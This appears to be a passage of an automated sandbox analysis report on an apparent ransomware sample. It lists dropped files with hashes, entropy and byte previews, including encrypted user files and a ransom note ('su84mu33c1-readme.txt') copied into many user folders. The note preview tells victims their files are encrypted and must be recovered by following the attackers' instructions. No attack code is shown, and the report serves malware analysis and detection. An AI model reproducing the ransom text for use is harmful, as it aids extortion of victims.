          MD5:270F073961DD8629614E5E6304A7964E
          SHA1:7E28051FEB5009403FD21BF543AAE28280BA7FF6
          SHA-256:DF6C40D0E5862A65E61C5EFBD8694E46E2658CF76921D7B5E50F7D370AFBCF55
          SHA-512:F6A582E6501A0E533B5157AB0FC35D7C097354696722768DCE11DB98151363BB6908DE63AFFFE31378CC4F03601F0F3F83CAD52B53536F85CAB95C067868A7FE
          Malicious:false
          Preview: ...e...S[zG..)e8.4.!....a.p.....8...Q......H.m\1lp?9T....mF.G..(..V.q!.".U............9.`F.\.......B.3..gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|N.#,f..LaY Hed.X...E...%.....6$..,/.2.}...........N,.
          C:\Users\user\Favorites\Youtube.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):344
          Entropy (8bit):7.384531815721122
          Encrypted:false
          SSDEEP:6:Ax6u9K7fhMuhaY7iTfY7es/1oXk+vYro1wANxP7GjqhT6/XKArAGyo/bfA9Cu9rS:yKbh/aY7iw1j86ANh7HT6/XKArtboS
          MD5:4940D3F33B9CDAEC0A00E1C7875C4341
          SHA1:F03C5228D94C21D6ED35263B68AA3029DD31D1D4
          SHA-256:75038A1ECE0DC818489137B927FA2C193ED6A11FAD89F0D7BAA22C72494BADD7
          SHA-512:DAF209EBCCBE60F1A41273007609F1A9D829FAB43CFDEFAC5F42683058F14EA2803D7AB44A965C0912523E1CA81F50E13266A9DA3A5EB859CE1E992D028CF54F
          Malicious:false
          Preview: .B#\FhfX......;~.;S.nr.v.]..a...n..zB.+......?D..[.......x....E.....}R...G...K[...v-R..m.`.O.....|$C.<....z'....gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|T..*...(....?.#K.C0....6.P.#9.e..7>.<+..K..........L...
          C:\Users\user\Favorites\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Links\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Music\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\OneDrive\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Pictures\Camera Roll\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Pictures\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Recent\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Saved Games\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Searches\Everywhere.search-ms
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):480
          Entropy (8bit):7.53934524568469
          Encrypted:false
          SSDEEP:12:3Bq0hF7mM3qVwrZnwAwzz1j86ANh7HT6/XKAr4JflL:zH7mMdhwVRXADn+zalL
          MD5:8B54EF9801C0120AEE6EFD1E0B4BB7A8
          SHA1:A9ADE0E45DFB5BD42938290B5AEB32A8DC8BA567
          SHA-256:C0669B2316323C0831722ED2E05FF8CBA37A27EF05B9694C5FDCC1BC362DFECF
          SHA-512:6C82795FD3C99C5346BEF31AF92110CF80CA1B1F7B433640901E24E6D6D502E2C1AD5E35E3A6C7B7D4FA55D6B2E75BC8C85F3F0195C675FE3AAC3D64E2BBD33B
          Malicious:false
          Preview: ...)9.....d(.z..`.)[.:d......._..8..->%.G..U.z/....`.T^.........x..8PN..W.'O.k..4.......1k...~2...../..ch..../.{8..R.x.58.\G...U.......+.O.g9....h 0..k.l6......G)_I...9...1.|......D%......p.QwL.D....Z...Q....I. E..I...`..G..........7y..gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|.b.&..PJ...3f...bQ.vH.YE&c.......H....3..4..........G\.
          C:\Users\user\Searches\Indexed Locations.search-ms
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):480
          Entropy (8bit):7.524178482347865
          Encrypted:false
          SSDEEP:12:ZGEUDw0Bca8yCfNd0nvrencHyM1j86ANh7HT6/XKArFrFQf:Daw0BccSd0nvrencHvXADn+zXQf
          MD5:4F39322A457E9A6B67DE4EBB87A70F0C
          SHA1:A81E3FE7D40A154B32D844BF5DDF34EE3974D8B8
          SHA-256:9A8292D15EBE02D8CAF0AB95F678F92B8A8648A54CF7C1CFDBC2D4F236A7FD41
          SHA-512:3FF9A81A3702770A849D03DF272AC6316A445EE4C0D2878608FD7FA1B1C8EDBFFAC4F5DBC306782F61410CBBEDBD143F05720FB166C3EB073C0F7033A5D02242
          Malicious:false
          Preview: iUzQV~......).zA|....}R.rqf......J).o.<u..]-{.}.>.f..m~s?.j...h.;5.p....nE...3..ckY.g .._.f.L....0N..w..M...].9J..?u.a.}{a.......5g.G/...e...IG.1...."M..3.J.....p..."'Jv....1...j-w@."iy.m....S$k6I.9Q.....J.b~....Rt9W......i.a.....R.....f..gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|...r....x.V|.|.Xq.,....\..."~l..jij....Q.............
          C:\Users\user\Searches\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Videos\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
